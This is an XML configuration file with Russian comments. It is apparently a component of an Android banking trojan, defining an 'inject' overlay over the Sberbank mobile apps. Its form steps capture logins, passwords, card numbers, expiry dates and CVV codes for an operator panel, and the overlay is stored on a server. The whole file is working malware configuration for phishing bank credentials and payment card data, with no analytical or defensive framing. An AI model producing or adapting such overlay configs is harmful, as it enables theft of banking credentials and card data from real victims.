<?xml version="1.0" encoding="UTF-8"?><!-- Файл должен быть в кодировке UTF-8 (без BOM) -->
<document>
	<name>Сбербанк</name><!-- Название инжекта -->
	<apps>ru.sberbankmobile;com.mobilecard.sberbank</apps><!-- Приложения, которые будут перекрываться (через точку с запятой) -->
	<size>1</size><!-- Размер инжекта (1 - стандартный, 2 - в виде диалога) -->
	<storage>2</storage><!-- Место хранения инжекта (1 - в устройстве, 2 - на сервере) -->
	
	<step><!-- Новый шаг (форма) -->
		<param><!-- Параметр в шаге (форме) -->
			<column>Логин</column><!-- Название колонки (для вкладки "Инжекты"->"Данные") -->
			<name>login</name><!-- Название параметра (поле name в форме в файле index.html) -->
		</param>

		<param>
			<column>Пароль</column>
			<name>password</name>
		</param>

		<param>
			<column>Логин2</column>
			<name>login</name>
		</param>

		<param>
			<column>Пароль2</column>
			<name>password</name>
		</param>
	</step>

	<step>
		<param>
			<column>ГГ2</column>
			<name>expiry_year</name>
		</param>

		<param>
			<column>ММ2</column>
			<name>expiry_month</name>
		</param>

		<param>
			<column>Карта2</column>
			<name>card_number</name>
		</param>

		<param>
			<column>ГГ</column>
			<name>expiry_year</name>
		</param>

		<param>
			<column>Карта</column>
			<name>card_number</name>
		</param>

		<param>
			<column>ММ</column>
			<name>expiry_month</name>
		</param>
	</step>

	<step>
		<param>
			<column>Cvv</column>
			<name>cvv</name>
		</param>

		<param>
			<column>Cvv2</column>
			<name>cvv</name>
		</param>
	</step>

</document>